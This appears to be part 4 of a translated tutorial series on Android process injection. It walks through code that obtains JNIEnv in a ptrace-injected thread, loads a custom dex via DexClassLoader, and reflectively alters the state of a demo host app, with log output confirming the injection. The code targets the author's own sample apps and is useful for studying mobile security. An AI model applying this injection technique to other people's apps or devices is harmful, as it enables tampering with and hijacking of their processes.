Attack Android injection 4

Attack Android injection 4
Continue to introduce the injection technology in previous articles 1, 2, and 3. This chapter begins to explain what needs to be done after the injection. If you are familiar with the injection technology, you can read this chapter directly. Otherwise, it is better to read the first three chapters first.
After the injection, the injection is completed, which is only the first step of the long journey. As we all know, Android Application processes are child processes incubated by Zygote, and each process runs in an independent JVM. Through ptrace injection, we get the chance to execute code in the target process, but it is a little bit inferior to modifying JVM content. Let's take a look at the key code injected with SO in "2:

void Main();    static void* _main(void*){      Main();      return NULL;  }    class EntryClass {  public:        EntryClass() {          pthread_t tid;          pthread_create(&tid, NULL, _main, NULL);          pthread_detach(tid);      }    } boy;  

When so is injected, our logic code is actually running on a Linux thread. This aims to avoid interference with the main thread. Our goal is to get through the Java layer. We naturally think of JNI. Through JNI, we can interact with the Java layer. However, there is a lack of a very important element-JNIEnv. Without this object, JNI will not start.
In Example 3, JavaVM is globally unique in a JVM process, while JNIEnv is allocated by thread. In addition, Dalvik threads correspond to Linux threads one by one. Therefore, we can import the Attatch thread to JavaVM, and JavaVM will allocate the JNIEnv object to us. By reading the Dalvik source code, we can get the JavaVm address from AndroidRuntime, and then get JNIEnv through the AttachCurrentThead and DetachCurrentThread functions provided by JavaVm. The sample code is as follows:

JNIEnv * jni_env = NULL; JavaVM * jvm = AndroidRuntime: getJavaVM (); jvm-AttachCurrentThread (& jni_env, NULL); // TODO use JNIEnvjvm-> DetachCurrentThread ();

So far, we have obtained the crucial JNIEnv object. Next, we load our dex file through DexClassLoader. The key code is as follows: First find SystemClassLoader

//ClassLoader.getSystemClassLoader()static jobject getSystemClassLoader(){ jclass class_loader_claxx = jni_env->FindClass("java/lang/ClassLoader"); snprintf(sig_buffer, 512, "()%s", JCLASS_LOADER); jmethodID getSystemClassLoader_method = jni_env->GetStaticMethodID(class_loader_claxx, "getSystemClassLoader", sig_buffer); return jni_env->CallStaticObjectMethod(class_loader_claxx, getSystemClassLoader_method);}

Then, use SystemClassLoader to generate the DexClassLoader object.

snprintf(sig_buffer, 512, "(%s%s%s%s)V", JSTRING, JSTRING, JSTRING, JCLASS_LOADER);jmethodID dexloader_init_method = jni_env->GetMethodID(dexloader_claxx, "<init>", sig_buffer);snprintf(sig_buffer, 512, "(%s)%s", JSTRING, JCLASS);jmethodID loadClass_method = jni_env->GetMethodID(dexloader_claxx, "loadClass", sig_buffer);jobject class_loader = getSystemClassLoader();check_value(class_loader);jobject dex_loader_obj = jni_env->NewObject(dexloader_claxx, dexloader_init_method, apk_path, dex_out_path, NULL, class_loader);

Finally, load dex through dex_loader_obj, find the entry to the custom method, and call

jstring class_name = jni_env->NewStringUTF("com.demo.inject2.EntryClass");jclass entry_class = static_cast<jclass>(jni_env->CallObjectMethod(dex_loader_obj, loadClass_method, class_name));jmethodID invoke_method = jni_env->GetStaticMethodID(entry_class, "invoke", "(I)[Ljava/lang/Object;");check_value(invoke_method);jobjectArray objectarray = (jobjectArray) jni_env->CallStaticObjectMethod(entry_class, invoke_method, 0);

So far, our dex logic has been executed. Let com. demo. inject2.EntryClass. as the entry function, invoke uses com. demo. inject code, for com. demo. the Data printed by the host is modified again (the same process is injected twice consecutively, which should be painful ). Let's take a look at the invoke code in inject2:

package com.demo.inject2;import java.lang.reflect.Method;import android.content.Context;import android.util.Log;/** *  * @author boyliang *  */public final class EntryClass {public static Object[] invoke(int i) {try {Log.i("TTT", ">>>>>>>>>>>>>I am in, I am a bad boy 2!!!!<<<<<<<<<<<<<<");Context context = ContexHunter.getContext();Class<?> MainActivity_class = context.getClassLoader().loadClass("com.demo.host.MainActivity");Method setA_method = MainActivity_class.getDeclaredMethod("setA", int.class);setA_method.invoke(null, 1);} catch (Exception e) {e.printStackTrace();}return null;}}

The code is very similar to the example of "3", but the entry points are different. Note that there are also restrictions on parent-child delegation.
Output am start com. demo. host/. MainActivity
./Poison/data/local/tmp/libimportdex. so 738

Let's look at the output in Example 3.

com.demo.inject starts.I/TTT     (  738): com.demo.host startsI/TTT     (  738): 1I/TTT     (  738): 2I/TTT     (  738): 3I/TTT     (  738): 4I/TTT     (  738): 5I/TTT     (  738): >>>>>>>>>>>>>I am in, I am a bad boy!!!!<<<<<<<<<<<<<<I/TTT     (  738): 998I/TTT     (  738): 999I/TTT     (  738): 1000I/TTT     (  738): 1001I/TTT     (  738): 1002I/TTT     (  738): 1003I/TTT     (  738): >>>>>>>>>>>>>I am in, I am a bad boy 2!!!!<<<<<<<<<<<<<<I/TTT     (  738): 1I/TTT     (  738): 2I/TTT     (  738): 3I/TTT     (  738): 4I/TTT     (  738): 5I/TTT     (  738): 6I/TTT     (  738): 7

The two string outputs prove that the injection modification has been successful. All code in the example has been uploaded to the https://github.com/boyliang/Java_Injection
So far, we have implemented the following functions: inject the target process to obtain the JNIEnv address, load Dex for the target process, and execute the specified method; distance from our target, another step is to intercept the broadcastIntent method. In Article 5, I will introduce another technology called BinderProxy. Through this technology, we can intercept any BinderService method.